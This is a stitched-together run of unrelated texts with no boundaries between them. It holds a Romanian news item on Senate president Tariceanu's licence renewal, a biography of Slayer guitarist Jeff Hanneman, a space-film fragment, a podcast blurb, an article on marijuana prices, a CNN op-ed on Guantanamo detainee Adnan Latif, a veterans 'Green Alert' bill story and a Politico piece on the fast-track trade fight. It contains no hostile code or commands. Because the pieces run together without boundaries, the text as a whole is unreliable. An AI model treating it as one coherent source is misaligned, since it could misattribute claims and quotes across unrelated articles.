Redactia HotNews.ro a solicitat un punct de vedere sefului Senatului , Calin Popescu Tariceanu , care va fi publicat imediat ce va fi primit.Iata mai jos filmul evenimentelor , descris de agentia News.ro : : Autoturismul Dacia Duster negru apartinand Senatului , in care se afla , pe locul din spate , Calin Popescu Tariceanu , intra in curtea DRPCIV . Soferul pare dezorientat si nu gaseste intrarea spre curtea interioara din cauza numarului mare de persoane care stateau la rand , unii dintre ei inca de la ora 5.00 . Masina se strecoara printre oameni si ajunge pe rampa care duce spre curtea interioara . Calin Popescu Tariceanu nu iese imediat din masina , ci asteapta ca unul dintre reprezentantii DRPCIV sa iasa din cladire si sa-l intampine.La inceperea programului de lucru cu publicul , oamenii care asteapta la rand ar trebui sa fie lasati sa intre in cladire . Deschiderea este insa intarziata.Calin Popescu Tariceanu iese din cladirea DRPCIV pe aceeasi usa pe care a si intrat , fiind insotit de unul dintre angajatii institutiei . Desi s-a oprit cand a fost salutat , s-a intors cu spatele si a intrat in masina in momentul in care a fost intrebat de ziaristul News.ro de ce a ale sa intre pe o usa din spatele cladirii.Calin Popescu Tariceanu a evitat sa raspunda de ce a intrat prin spatele cladirii . Singurul care a raspuns a fost aghiotantul acestuia : `` Dar nu a intrat nimeni prin spate '' .Masina presedintelui Senatului a urcat rampa si s-a strecurat printre oamenii stransi , in numar si mai mare , la coada . Oamenii nu pareau deranjati de faptul ca Tariceanu a intrat pe usa din spate . O doamna care statea la rand intreaba : `` Dar ce aveti , domnule , cu Tariceanu ? Nu trebuie si el sa-si faca permisul ? `` .Oamenii care stau la rand sunt lasati sa intre in cladire.Reactia conducerii SRPCIV Bucuresti : `` Nu discut cazul unei persoane fizice '' Solicitat de News.ro sa comenteze aceasta situatie , comisarul-sef Florin Radulescu , seful Serviciului Public Regim Permise de Conducere si Inmatricularea Vehiculelor ( SRPCIV ) , a spus : `` Nu discut cazul unor persoane fizice , nu pot sa va dau date cu caracter personal '' .Intrebat cum i s-a putut permite lui Calin Popescu Tariceanu sa aiba intreaga cladire la dispozitie pentru reinnoirea permisului de conducere , Radulescu a spus : `` Habar nu am despre ce vorbiti . Nu stiu nici macar cu cine vorbesc , m-ati sunat pe numarul personal si nu cred ca v-am dat eu numarul . In cladire sunt mai multe institutii , nici nu stiu daca a venit la noi sau in alta parte '' .Surse din institutie afirma insa ca directorul adjunct al Serviciului Regim Permise de Conducere si Inmatriculare a Vehiculelor , comisarul-sef Cristian Nechifor , este cel care a avut cunostinta de modul in care Tariceanu si-a rezolvat problema reinnoirii permisului.Contactat de News.ro , comisarul-sef Cristian Nechifor a spus ca nu poate comenta , mai ales la telefon , aceasta situatie . `` Si oricum , daca a fost aici , tot ce s-a intamplat tine de domeniul informatiilor , datelor cu caracter personal si iar n-as putea sa va spun nimic '' , a spus adjunctul institutei.Intrebat daca , in opinia sa , reprezinta date cu caracter personal faptul ca presedintele Senatului intra prin spatele cladirii , timp in care cladirea este inchisa pentru public , Nechifor a replicat : `` Imi pare rau , dar nu comentez in niciun caz la un telefon pe care il primesc de la cineva despre care nu stiu cine e. O zi buna ! `` .In martie 2008 , a izbucnit un scandal dupa ce un echipaj s-a deplasat la domiciliul lui Tariceanu pentru a-i face poza pentru cartea de identitate sotiei sale de la acea vreme , Ioana Tariceanu . La acel moment ministru de Interne era Cristian David , coleg de partid cu Tariceanu , care a sustinut ca demersul este legal .
Jeffrey John Hanneman ( January 31 , 1964 – May 2 , 2013 ) was an American musician , best known as a founding member of the American thrash metal band Slayer . Hanneman contributed both lyrical and musical material to every Slayer album up until his death in 2013 and wrote the songs `` Raining Blood '' , `` War Ensemble , '' `` South of Heaven , '' `` Seasons in the Abyss , '' and `` Angel of Death , '' all of which have been played at almost every live Slayer performance after their respective compositions . He had his own signature guitar , the ESP Jeff Hanneman Signature model .
Biography [ edit ]
Early life [ edit ]
Hanneman was born January 31 , 1964 in Oakland , California , and grew up in Long Beach , California in a family containing several war veterans : his father fought in Normandy during World War II and his brothers in Vietnam , making warfare a common conversation topic at the dinner table . War films were popular on TV at the time , and Hanneman often joined his brothers in constructing and coloring tank and plane models . His interest in warfare and military history has been attributed to his upbringing . [ 1 ]
In a 2009 interview with Decibel magazine , he stated his father is German , but fought for the Allied side in World War II . In the same interview , he also goes into detail of what district of Germany his father and grandparents hail from . His grandfather was fluent in German . [ 2 ]
Hanneman was introduced to heavy metal music as a child through his older sister Mary , when she was listening to Black Sabbath at her house . [ 3 ] Once he reached high school , he discovered hardcore punk , which had a significant influence on his style and attitude .
Slayer [ edit ]
In 1981 Hanneman , who was working as a telemarketer at the time , met Kerry King , when King was auditioning for a southern rock band called `` Ledger '' . King remembered : `` As I was leaving , I saw Jeff just kinda standing around playing guitar , and he was playing stuff that I was into , like Def Leppard 's 'Wasted ' and AC/DC and Priest '' . [ 4 ] After the try-out session , the two guitarists started talking and playing Iron Maiden and Judas Priest songs . Slayer was born when King asked `` Why do n't we start our own band ? `` , to which Hanneman replied `` ... Fuck yeah ! '' . [ 1 ]
Hanneman stated that he was playing guitar for a year by the time he met King and put an effort into improving his skills after watching him play . [ 5 ] Hanneman , who was heavily influenced by hardcore punk music , got the other members into the genre , leading Slayer into a faster and more aggressive approach . The band 's drummer Dave Lombardo asserted that his hardcore influences pushed him to play faster , [ 5 ] contributing to shape his drumming style . [ 6 ]
In 1984 , Hanneman , Lombardo and Suicidal Tendencies guitarist Rocky George had a brief hardcore punk side project called `` Pap Smear '' – the band had many tracks and was due to start recording when Hanneman was advised to avoid the side project by Slayer 's producer , Rick Rubin , who is quoted as saying `` Aaaah , do n't do it , man – this is the kind of thing that breaks bands up ! `` [ 1 ] and Hanneman took Rubin 's advice . Only a demo was recorded , consisting of Hanneman on vocals and bass , Lombardo on drums and George on guitar . Later two of the songs were re-recorded on Slayer 's 1996 album Undisputed Attitude . [ 1 ]
Illness and death [ edit ]
In early 2011 , Hanneman contracted necrotizing fasciitis . Reports linked this illness with a spider bite he claimed to have received while in a friend 's hot tub . [ 7 ] [ 8 ]
In light of his illness and Slayer 's upcoming participation in the Australian Soundwave Festival tour that was set to begin on February 26 , 2011 , the band made the decision to play the dates without Hanneman , and on February 16 , 2011 , brought on Gary Holt ( Exodus ) to fill in for him . [ 9 ] Pat O'Brien joined as Slayer 's temporary second guitarist when Holt left the tour to play with Exodus . [ 10 ] In 2012 , bandmate Tom Araya announced a recovery from the disease . However , in February 2013 , Kerry King revealed that Hanneman was still battling health issues that prevented him from working .
Hanneman died of liver failure on May 2 , 2013 , in a Southern California hospital near his home . [ 11 ] [ 12 ] On May 9 , 2013 , the official cause of death was announced as alcohol-related cirrhosis . Hanneman and his family had apparently been unaware of the extent of the condition until shortly before his death . [ 13 ]
Personal life [ edit ]
In 1989 , Hanneman married Kathryn in Las Vegas . [ 14 ] They had met in 1983 before the release of the debut album Show No Mercy , during a Slayer show in Buena Park , California . [ 4 ] The couple had no children and lived in Los Angeles . Kathryn stayed at home when Slayer toured ; Hanneman claimed to prefer this , having said that when he came home , she was `` all brand new again . '' Kathryn only toured with the band twice in twenty years .
Hanneman was a reserved person when he was offstage . Unlike the other members , he was very selective in socializing and rarely gave interviews . As vocalist/bassist Araya said : `` If he did n't like you , he would n't hang with you . `` [ 4 ]
German history [ edit ]
The Knight 's Cross
Hanneman 's interest in German war medals and Nazi Germany was illustrated by many of his lyrics . Those interests in the Wehrmacht and Waffen-SS began with medals given to him by his father , including some taken from a dead German soldier . [ 15 ] His most prized medal was his Knight 's Cross , which he had bought from a Slayer fan for $ 1,000 . [ 15 ] While touring with Motörhead , Hanneman discovered Motörhead vocalist Lemmy 's interest in medals , and the two discussed medal designs , weapons and tactics used by the Wehrmacht . [ 1 ]
Hanneman 's lyrics for the song `` Angel of Death '' led to accusations of Slayer being Nazi sympathizers . [ 16 ] Hanneman defended himself with `` nothing I put in the lyrics that says necessarily he ( Josef Mengele ) was a bad man , because to me – well , is n't that obvious ? I should n't have to tell you that . `` [ 1 ] The band has stated numerous times that they are not Nazis and do not condone Nazism . [ 17 ]
Influences and style [ edit ]
Hanneman 's major influences included hard rock and heavy metal bands like Led Zeppelin , Iron Maiden , Judas Priest , [ 1 ] Black Sabbath , [ 3 ] Aerosmith [ 18 ] and hardcore punk acts such as Wasted Youth , Minor Threat , [ 19 ] Dead Kennedys , Black Flag , T.S.O.L. , [ 1 ] which led to Slayer 's 1996 album Undisputed Attitude . Hanneman 's and King 's dual guitar solos have been called `` wildly chaotic , '' [ 20 ] and `` twisted genius '' . [ 21 ] South of Heaven featured `` more technical '' guitar riffs , utilizing the aforementioned tremolo picking and down-picked notes , improving musicianship while retaining a melodic sense . Both Hanneman and King were ranked # 10 in Guitar World 's `` 100 Greatest Heavy Metal Guitarists of All Time . ''
Legacy [ edit ]
Hanneman 's guitar work had a notable influence on heavy metal music and culture . Musicians such as Robb Flynn [ 22 ] ( Machine Head ) , Dino Cazares [ 22 ] ( Fear Factory , Divine Heresy ) , Mille Petrozza [ 23 ] ( Kreator ) , Andreas Kisser [ 24 ] ( Sepultura ) , Dan Lilker [ 25 ] ( Anthrax , Nuclear Assault ) , Eric Hoffman [ 25 ] ( Amon/Deicide ) , Trevor Peres [ 25 ] ( Obituary ) , Mark Morton [ 26 ] ( Lamb of God ) and Kelly Shaefer [ 25 ] ( Atheist ) cited him as an influence on their playing and songwriting . Jeff Walker said that `` Hanneman 's playing and riff writing and attitude has had a big impact on Carcass '' . [ 25 ] Shavo Odadjian declared that `` without Jeff Hanneman , there would be no System of a Down '' . [ 27 ]
John Consterdine of Terrorizer magazine noted : `` without Jeff Hanneman , Slayer certainly would not have created some of the most famous riffs in metal , which undoubtedly changed the entire genre '' . [ 28 ] According to Jeff Kitts of Guitar World , he `` influenced a generation and changed the course of metal forever '' . [ 4 ] Alex Webster of Cannibal Corpse , who considers Hanneman his major influence as a composer , [ 29 ] regarded him as `` one of the greatest musicians and songwriters in metal '' [ 30 ] and Alexi Laiho of Children of Bodom described him as `` one of the fathers of metal '' . [ 31 ]
Alex Skolnick of Testament asserted that he `` wrote some of the best riffs of all time '' [ 31 ] and `` he impacted music in such a way that an entire genre will never be the same '' . [ 32 ] According to Corey Taylor of Slipknot and Stone Sour , Hanneman is `` one of the most underrated writers and underrated players that ever was '' [ 31 ] while Slash of Guns N ' Roses and Velvet Revolver defined him `` the king of thrash/speed metal guitar '' . [ 33 ]
Lyrics and music [ edit ]
Hanneman wrote the music for most of the band 's fan favorites , songs such as `` Angel of Death '' , `` Raining Blood '' , `` Die by the Sword '' , `` South of Heaven '' , `` War Ensemble '' , `` Postmortem '' , `` Dead Skin Mask '' and `` Seasons in the Abyss '' , which have all become staples for live performance at Slayer shows . Hanneman 's favorite album was Reign in Blood , and he enjoyed performing the songs `` Raining Blood '' and `` Angel of Death . `` [ 1 ] He contributed lyrics and music to every Slayer album , having formed a music and lyric writing partnership with Araya , which sometimes overshadowed King 's creative input . [ 16 ]
When writing new material , the band writes the music before the lyrics . [ 1 ] Hanneman often composed riffs at his house , using a 24-track and a drum machine and then by gathering opinions from the other band members ; King and Lombardo made suggestions of alterations . The band will play the riff to get the basic song structure , and then figure out where the lyrics and solos go . [ 1 ] Hanneman stated that writing lyrics and music is a `` free for all '' ; `` It 's all just whoever comes up with what . Sometimes I 'll be more on a roll and I 'll have more stuff , same with Kerry – it 's whoever 's hot , really . Anybody can write anything ; if it 's good we use it , if not we do n't . `` [ 1 ]
Equipment [ edit ]
Hanneman used a black Gibson Les Paul modified with a Kahler Pro tremolo and a Joe Barden Two/Tone Humbucker bridge pickup in Slayer 's early days and through the Show No Mercy and Hell Awaits eras . There are also photos and videos of him playing a natural stain-finished Gibson Explorer during the band 's early days . In mid 1985 he began playing B.C . Rich guitars , notably a Rich Bich model he bought off his bandmate Kerry King and subsequently applied various graphics to . His first Bich had a 3x3 headstock , chrome hardware ( including the Kahler Pro bridge ) and two DiMarzio Super Distortion pickups . He and King can both also be seen with a second set of B.C . Rich 's around 1986-1987 , which had 6-in-line headstocks , black hardware and DiMarzio pickups . He also used a B.C . Rich Ironbird model more rarely . From 1987 , he was seen using a custom made B.C . Rich Gunslinger with similar specs as his '86-'87 era Bich , shortly after he had the pickups replaced with two active EMG 81 humbuckers . In 1988 he began playing the famous Jackson Soloist that he would use constantly as his main guitar for songs played in E-flat tuning until 2001 . It was originally shipped to him with passive Jackson pickups ( probably a J-50 and J-80 ) and a JE-1200 mid-boost circuit , but the pickups were soon changed for EMG 81 pickups and the mid-boost circuit was removed as well . Around 1990-1991 Hanneman began using ESP guitars , he mostly used as backup for this Jackson Soloist and other tunings . He had his own signature model made , based on the specs of his original Jackson Soloist . In 2000 , Hanneman switched to ESP guitars , which he used exclusively until he stopped touring in early 2011 . ESP also gave Hanneman his own signature model ( see below ) , which is still available for purchase . When touring , Hanneman carried six guitars due to the different tunings he utilized . Most albums such as Haunting the Chapel – Divine Intervention and World Painted Blood have E-flat tuning . However , albums such as Diabolus in Musica – Christ Illusion feature alternate tunings such as Drop B and utilizing seven-string guitars . The first album , Show No Mercy , was recorded in standard tuning , while live performances of those songs were played in E-flat since about 1984 .
Jeff Hanneman 's 3 × 6 stack of Marshall ModeFour guitar cabinets on stage at the Tuska Open Air Metal Festival in 2008 . The bottom row is all active with the others being dummies .
Guitars [ edit ]
Effects [ edit ]
Shure Wireless System
Eventide H3000S Harmonizer
Yamaha SPX-90 Effects Processor
Rocktron Super C HUSH
MXR Smart Gate
BOSS RGE-10 ( 10 band EQs )
Amplification [ edit ]
Marshall JCM800 2203 amplifiers
Marshall JCM800 1960 Cabinets , later ModeFour Speaker Cabinet , supposedly loaded with Celestion G12T-75 Speakers
Discography [ edit ]
For a more comprehensive list , see Slayer discography
References [ edit ]
Quotations related to Jeff Hanneman at Wikiquote
Filmmakers have tackled space travel from the first days of film – which is to say , before there was space travel . The most famous image from silent movies is Méliès 's “ Man in the Moon ” with a rocket in his eye . Early films adapted H.G . Wells , Jules Verne , and the adventures of Flash Gordon and Buck Rogers . By the time humanity reached orbit ( Sputnik in 1957 , cosmonaut Yuri Gagarin in 1961 , and astronaut John Glenn in 1962 ) popcorn-munching crowds had already flocked to theaters for “ Destination Moon ” ( 1950 ) and “ Forbidden Planet ” ( 1956 ) .
The birth of space travel is inextricably bound up with the Cold War . The United States and the Soviet Union were fighting proxy wars around the world . Nuclear submarines probed the seas ; spy planes scraped the upper limits of the atmosphere . It was only natural to think of space as one more contested frontier – high ground we had to conquer before the enemy did .
improv4humans # 161
Special musical guests Cory Branan & Taylor Locke joins Jon Gabrus , Will Hines , and Drew Spears to create the next gen Google Goggles in a musical edition of improv4humans with Matt Besser ! Cory & Taylor play songs that inspire scenes about feeling out of place in a skate rink , what happens when a girl who used to date bad boys starts dating an improv nerd , living arcade machines , and much more ! Humans , watch Matt Besser & Rich Fulcher 's Adult Swim infomercial parody “ In Search of Miracle Man ” right now on YouTube . Be sure to watch many of the stars of improv4humans on the new Hulu series Hotwives of Orlando . This is some funny shit and it 's all available now on Hulu Plus . Make sure to get the Upright Citizens Brigade television show season 3 now available on DVD , the UCB Comedy Improv Manual , Matt Besser 's new comedy album at mattbesser.com , and check out Cory Branan 's music over at www.corybranan.com !
An employee measures and fills 1 gram bags of marijuana for retail sale at Sea of Green Farms in Seattle , Washington June 30 , 2014 . REUTERS/Jason Redmond Over the last two decades marijuana has practically been an unstoppable force .
Since 1995 , 23 states have legalized marijuana for medicinal purposes , while four states ( along with Washington D.C. ) have legalized all aspects of marijuana , including its recreational use for adults . Even in states where marijuana failed to gain approval initially , such as Oregon , the proverbial scales were tipped in favor of supporters just a few short years later .
Even Congress is getting in on the act . In March , three U.S . Senators introduced the CARERS Act , which is a bill aimed at decriminalizing medical marijuana . The CARERS Act would make it easier for banks to make loans to legal medical marijuana businesses , would remove some of the barriers associated with medical marijuana research , and most importantly would reschedule marijuana from a schedule 1 , or illicit drug , to a schedule 2 drugs , signifying that it does have medical benefits , even if it is prone to abuse .
But , have you ever really thought about the hypothetical economic implications of what would happen if marijuana was made legal nationwide ?
According to website Priceofweed.com , and as reported by Forbes , the price of a high-quality ounce of marijuana would drop considerably if it were legalized . Priceofweed.com allows users across all 50 states to input how much they 're paying for an ounce of marijuana , either legally or on the black market , and then it aggregates this data into an average price per ounce for each state . Based on the nationwide data , the current average price per ounce of marijuana in the United States is $ 324 .
Price depends on location
Unsurprisingly , the states with the cheapest marijuana tended to be those which legalized the drug across the board . Oregon leads the pack with a price per ounce of just $ 204 , with Washington and Colorado occupying the second- and fourth-cheapest costs per ounce at $ 232 and $ 243 , respectively . The third- and fifth-cheapest states are California ( $ 242 ) and Nevada ( $ 265 ) , which were among the first medical marijuana adopters .
Customers shop for `` Green Friday '' deals at the Grass Station marijuana shop on Black Friday in Denver , Colorado November 28 , 2014 . Rick Wilking/Reuters
On the flipside , North Dakota currently holds the lead on the other end of the spectrum at a cost of $ 387 per ounce . Following behind are Vermont ( $ 367 ) , Virginia ( $ 363 ) , Iowa ( $ 362 ) , and a three-way tie for fifth at $ 360 per ounce between South Dakota , Pennsylvania , and Maryland . Also not surprising , with the exception of Maryland none of these states have even approved medical marijuana for legal use . Maryland 's law passed in 2014 and it 'll likely take time before it has a meaningful effect on lower marijuana prices .
Lessons learned from the prices of marijuana
The clear implication from the aforementioned data is that legalizing marijuana nationwide would more than likely cause prices to drop substantially on a per-ounce basis . Obviously recreational consumers would like this , but I 'm thinking about this more in terms of the potential therapeutic benefits marijuana might offer . If marijuana prices fell it could potentially open the door for more consumers to benefit since it would be more affordable , and it might even encourage insurers to begin covering the drug for select diseases and disorders , assuming marijuana were rescheduled from its current illicit status .
Nationwide legalization would also be a potential benefit to drug developers like GW Pharmaceuticals ( NASDAQ : GWPH ) who are specializing in cannabinoid-based drugs from the cannabis plant . Although these companies ( and GW Pharmaceuticals ) tend to grow their own product for testing purposes , falling prices could help nominally lower drug development expenses , and a rescheduling of marijuana would drop many of the barriers currently in place that result in time and money lost when developing cannabinoid-based drugs .
On a margin basis , states that offer the highest price per ounce might take a small hit with regard to tax revenue collection since lower prices mean lower margins . However , Econ 101 comes into play here : at a lower price point , quantity demanded will be higher . So , we could expect that the degradation in margins would be made up for by an increase in volume .
NerdWallet has suggested that a nationwide legalization could lead to $ 3.1 billion in additional tax revenue collected , which is n't pocket change and can be used to support government-based jobs or help close individual states ' budget gaps . If Colorado 's first-year marijuana tax revenue of $ 699 million is any indication — it surpassed estimates by $ 121 million— NerdWallet 's estimate may even wind up being conservative .
Pre-rolled marijuana joints are pictured at the Sea of Green Farms in Seattle , Washington June 30 , 2014 . REUTERS/Jason Redmond
Challenges to overcome
Of course , President Obama and presidential candidate Hillary Clinton have taken a toned -own view of marijuana 's recent support . While both have acknowledged that the four recreation-legal states will serve as an experiment for the rest of the nation , Obama , for example , has insinuated that marijuana is a relatively low priority for his administration .
In short , the winds of change are still blowing slowly on Capitol Hill . Even with growing support for some level of marijuana legalization or decriminalization , it 's unlikely we 'll witness any major changes prior to , or even shortly after , the 2016 elections .
As President Obama has suggested , the best way to get the attention of lawmakers is to get even more states on board with either the recreational marijuana or medical marijuana experiment . Support for medical marijuana is substantially higher among the public than an all-use legalization , so any bill introduced on a federal level is more than likely to take this route . However , this is a path that I believe could still be many years off .
As I 've said before , and I 'll repeat again : even though support for , and state legalization of , marijuana is rapidly building , it still remains a very risky investment .
By Letta Tayler , Special to CNN
Editor 's note : Letta Tayler is a senior terrorism and counterterrorism researcher at Human Rights Watch . The views expressed are the author 's own .
As the world was gripped this week by the storming of U.S. diplomatic compounds in the Middle East , another troubling event that coincided with the September 11 anniversary unfolded largely unnoticed at the U.S. military prison at Guantanamo Bay .
There , a prisoner found dead in his cell over the weekend was identified Tuesday as Adnan Latif , a Yemeni who had been cleared for transfer five years earlier . Latif 's death should serve as a wake-up call for the United States to change its tarnished response to 9/11 by closing Guantanamo , even as it grapples with the horrifying attacks on its missions in Libya , Egypt and Yemen .
Latif , 32 , had reportedly been suicidal for most of the decade he spent at Guantanamo . Year after year , the U.S. government maintained he had trained and fought with al-Qaeda in Afghanistan , but never formally charged him with any crime . U.S. officials said he was found unresponsive in his cell on Saturday and did not respond to emergency treatment .
Latif is the ninth detainee to die at Guantanamo . The U.S. military says five of those prisoners committed suicide ; the others , it says , died of natural causes . Of the 167 detainees remaining at Guantanamo , only six face active charges , according to Human Rights Watch .
“ You are still looking for justice and seeking hearings , ” Latif wrote to his lawyer in 2010 in one of a torrent of letters and poems he penned during his detention , much of it spent in isolation or a psychiatric ward . “ I am being pushed toward death . ”
As far back as 2004 , according to NBC , the Defense Department conceded it had no knowledge of Latif 's training in any terrorist activities and recommended his transfer from Guantanamo . The Bush administration even authorized Latif 's transfer in 2007 .
But that information only came to light in 2010 in an opinion by a federal judge who ruled that the government had failed to demonstrate that Latif was part of al-Qaeda or the Taliban , and ordered Latif 's immediate release . U.S. District Court Judge Henry Kennedy Jr. concluded that Latif had made a “ plausible ” claim that he left Yemen to seek free medical treatment .
Kennedy 's order should have marked the final chapter in the sordid tale of Latif 's indefinite detention without charge . But rather than do the right thing by sending Latif home or to a third country , the U.S. government successfully appealed Kennedy 's ruling . A Washington , DC appeals court in 2011 not only overturned Kennedy 's decision , it also severely undercut Guantanamo detainees ' ability to challenge their detention . Henceforth , the court ruled , lower courts must presume that evidence against detainees is accurate barring clear evidence to the contrary – even if it was obtained in chaotic battlefield settings . In June , the Supreme Court decided not to consider an appeal .
In the meantime , the Obama administration froze all transfers from Guantanamo to Yemen after a Nigerian trained by al-Qaeda in Yemen tried to blow up a passenger jet over Detroit in 2009 . Then Congress passed legislation making it more difficult to transfer Guantanamo detainees to at-risk countries such as Yemen .
Latif reportedly suffered seizures and a dislocated shoulder during his years at Guantanamo . He was repeatedly force-fed through his nose during his frequent hunger strikes , which at one point reduced his weight to less than 90 pounds . David Remes , his lawyer , told Human Rights Watch that in 2009 , Latif tried to slit his wrists in front of him , using a strip of broken veneer from a prison interview table . The following year , Remes said , he found Latif with abrasions around his neck from an attempt to strangle himself with the waistband of his underwear . At the time of his death , U.S. officials said he was in a disciplinary cell for having thrown a “ cocktail ” of bodily fluids at his guards .
It reportedly took Latif more than two years even to get a military review hearing at Guantanamo . According to Human Rights Watch , when he protested that the name on his form was not correct , the head of the panel merely replied , “ Well , that 's the name we have . ”
Latif , who was picked up at the border of Afghanistan and Pakistan , told the military review board that he went to both countries in search of a free operation promised by an Islamic charity for head injuries he had suffered in a car accident . He said he was too poor to afford the surgery at home . The board rejected his plea to search for medical records that would support his story . The medical records , later obtained by Latif 's lawyers and sent to Human Rights Watch , described acute head injuries and recommended that he seek an additional operation .
As events this week in the Middle East remind us yet again , the Obama administration is right to remain vigilant against security threats . In Latif 's homeland of Yemen , the 11th anniversary of 9/11 was marked by a bombing in the heart of the capital , Sanaa , which killed at least a dozen people and narrowly missed the Yemeni defense minister , who has supported the U.S. counterterrorism program in Yemen . On Thursday , the turmoil that began on September 11 in Benghazi and Cairo spread to Sanaa as well , where scores of men bearing Islamic flags and chanting “ Death to America ” breached the wall of the U.S. Embassy , a compound that al-Qaeda had attacked in 2008 .
But these attacks should not become a fresh excuse for President Obama to continue abandoning his inauguration pledge of nearly four years ago to close Guantanamo . The detainees still held there without charge had nothing to do with the events in Benghazi , Cairo and Sanaa . And holding them for crimes the administration fears they might commit violates U.S. legal obligations and generates animosity from populations abroad who might be potential allies in efforts to end global terrorism .
Instead of continuing to keep the ugly problem that is Guantanamo swept under the rug , the administration should end its practice of indefinite detention without charge and release and repatriate the Guantanamo detainees it lacks evidence to prosecute , monitoring them if necessary .
The temptation to compromise American values , including the right to due process , runs high during crises such as the one the U.S. faced this week . But doing so is a disservice to the memory of the nearly 3,000 victims of 9/11 and to the tens of thousands of other victims of violent militancy around the world , including those who died Monday in Yemen and Tuesday in Benghazi . It also is a disservice to the memory of Adnan Latif , who never had a chance to make his case .
A bill up for a public hearing at the State Capitol on Thursday would add a `` Green Alert ' to state Silver and Amber alerts to notify the public when vulnerable veteran goes missing .
The bill was inspired by a Milwaukee man named Corey Adams . Adams was in the Airforce . He served four years on active duty and nearly 20 years in the reserves . He went on several tours to the Middle East . Over the past few years , he struggled with PTSD .
On March 20 , Corey Adams ' mother says she reported him missing to police a few hours after he missed a doctor 's appointment .
She said she knew it was serious when she saw his wallet , glasses and medication still in the house . According to his family , It took the police department eight days to consider him critically missing .
`` For a soldier to gone and have fought for his country and to come back and be missing and he does n't meet the criteria , I thought that was just a disgrace , '' Corey 's mother Gwendolyn Adams said .
Corey 's body was found in a Milwaukee park 18 days after he went missing . They say they think the public would have been notified about his disappearance sooner , he would have been found .
`` Had there been a green alert that was out there immediately I really believe that he would have been found , '' Adams said .
The bipartisan bill would add Green Alerts to the already existing Silver and Amer Alert systems . One of the bill 's authors says it would be an easy way for the state and for the public to help veterans .
`` When a veteran who is having mental issues goes missing everything should be done by everybody to get them help . That 's all this bill does . The system is already in place , '' State Rep. Joel Kleefisch , one of the co authors of the bill said .
State Sen. LaTonya Johnson is authoring the Senate version of the bill .
Rep. Kleefisch says he 's hoping to get the bill to the floor before the end of the session .
The most important trade bill in a decade has pitted Harry Reid against President Barack Obama . Liberal Democrat Rosa DeLauro against moderate Democrat Ron Kind . Labor unions against pro-business Democrats . And Elizabeth Warren against virtually everyone who supports a landmark piece of legislation that would allow the president to close what could be the biggest free-trade deal in history .
The open warring among Democrats over fast-track trade legislation , and the party 's broader existential crisis on free trade , grew more pronounced Thursday as senior lawmakers announced a breakthrough on the trade bill . Many Democrats still feel the burn , 20 years later , of lost manufacturing jobs from the North American Free Trade Agreement — pushed through by former President Bill Clinton — and they fear another Democratic president is on the verge of turning his back on working-class Americans by negotiating a trade deal that would send jobs overseas .
Story Continued Below
What 's at stake substantively is giving the president streamlined authority to negotiate the Trans-Pacific Partnership , a 12-country free-trade deal that would dwarf NAFTA . But there 's also much more at stake politically for a Democratic Party whose progressive wing is enjoying an upswing thanks to the aggressive populism of Warren and liberals like Sen. Bernie Sanders , who are unabashedly anti-free trade deal . Obama wants to cement a legacy on global free trade , but his work negotiating with Republicans has created several factions within the Democratic Party .
Take Kind and DeLauro . Both Democrats come to the fast-track debate from opposite sides .
Kind , a Wisconsin lawmaker who joined the trade-friendly New Democrat Coalition , has provided solid support for the White House , boosting its message that the TPP , which includes enhanced labor and environment protections , is n't reminiscent of the trade policy of years past .
DeLauro , from Connecticut , has been a central figure in the fight against the bill , forming a powerful progressive coalition of labor , environment , social justice and religious groups that argue any improvements are window dressing at best .
“ The single biggest economic issue facing American families is that jobs do not pay enough to live on , ” she said following the Trade Promotion Authority bill 's introduction on Thursday . “ Fast tracking the TPP would make it easier for corporations to offshore Americans jobs and force our workers to compete with those in Vietnam making less than 60 cents an hour . ”
While the New Dems on Thursday said they were still studying the legislation , they were encouraged by the inclusion of provisions to protect workers and renew trade preference programs . Kind has yet to issue a formal statement , but in January , the Wisconsin lawmaker talked favorably about fast track .
“ You can complain about [ to fast-track bill ] all you want , but if you allow a Republican Congress to amend and change [ future trade deals ] you 're going to end up in a worse position than what you started with , ” Kind said . “ It does n't make sense for a Democratic member to oppose it . ”
The internal Democratic wars are spilling into the presidential campaign as well , putting Hillary Clinton on the spot .
Clinton has been reluctant to show her hand on the pending trade legislation , although she voiced support for the massive Asia-Pacific pact that the administration is negotiating while serving as Obama 's secretary of state . When running against Obama for president in 2008 , she instead said the U.S. needed to take a `` timeout '' on trade .
Other potential Democratic candidates , including former Maryland Gov . Martin O'Malley , have assumed the progressive populist mantle and are already positioning themselves to Clinton 's left by preemptively coming out against the TPP .
Unlike Clinton , Warren has been unequivocal in her opposition to fast-track authority and the Asia trade deal , and that 's one of the reasons some anti-trade liberals keep pushing her to get in the presidential race , though she continues to say she is not interested .
Warren declared herself all in on the battle against fast track and the TPP deal at a rally on Wednesday .
“ We 're here today to fight , ” the Massachusetts Democrat said , whipping up a crowd of about 1,200 people in a park facing the Capitol Building . “ We are here to fight . Are you ready to fight ? ”
Most other Democrats in Congress , too , are skeptical of Obama 's free-trade agenda and are expected to vote against the trade promotion authority legislation , which will fast track trade deals through Congress by limiting amendments and subjecting the agreements to up-or-down votes .
The trade promotion authority bill introduced Thursday puts Obama and others who support the measure where they were a little more than a year ago when Reid stopped the legislation dead in its tracks . The Senate Democratic leader has never liked the legislation , voting against it in 1997 and 2002 . This time , however , the GOP controls the Senate .
Past trade deals “ have n't always lived up to their promise , ” Obama said in a statement issued Thursday , echoing a comment he made in his State of the Union address . But he asserted that he would only sign his name to an agreement that “ helps ordinary Americans get ahead . ”
“ The bill put forward today would help us write those rules in a way that avoids the mistakes from our past , seize opportunities for our future , and stay true to our values , ” Obama said .
In the Senate , where Utah Sen. Orrin Hatch , who chairs the Senate Finance Committee , wants a vote by late April , to fast-track trade bill will need six Democrats to support it to get to the 60-vote filibuster-breaking threshold .
However , at a Senate Finance Committee hearing on Thursday , Sen. Chuck Schumer ( D-N.Y. ) protested plans to rush to a vote .
“ Not fair and not adequate on such an important issue , ” the Senate 's third-ranking Democrat told Chairman Orrin Hatch . “ Not fair . Not fair . And you are a fair-minded man . ”
In the House , Republicans want a vote before the current legislative session breaks for the Memorial Day recess , Rep. Pat Tiberi , an Ohio Republican , said Thursday . The tally is expected to be close .
As few as 10 House Democrats , primarily from the ranks of the business-friendly New Democrat Coalition , are firmly committed to supporting the legislation . The measure needs 218 votes to pass in the lower chamber , which means getting the yeas of anywhere from 10 to 50 Democrats , depending on how many of the 247 Republicans in the House vote against the trade bill . Estimates of Republican defections vary widely from two dozen to as many as 60 .
“ What I can tell you , which is good news , is a lot of members are feeling the heat , ” Sanders said Wednesday night to constituents belonging to the liberal group Democracy for America .
